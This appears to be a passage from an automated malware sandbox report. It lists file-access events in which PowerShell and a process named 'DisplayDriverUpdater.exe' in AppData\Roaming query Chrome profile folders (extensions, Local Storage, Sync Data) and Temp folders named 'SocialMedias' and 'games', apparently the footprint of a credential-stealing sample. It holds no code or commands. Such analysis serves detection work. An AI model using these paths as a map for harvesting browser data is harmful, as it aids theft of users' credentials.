Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\user VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\user\SocialMedias VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\user\games VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
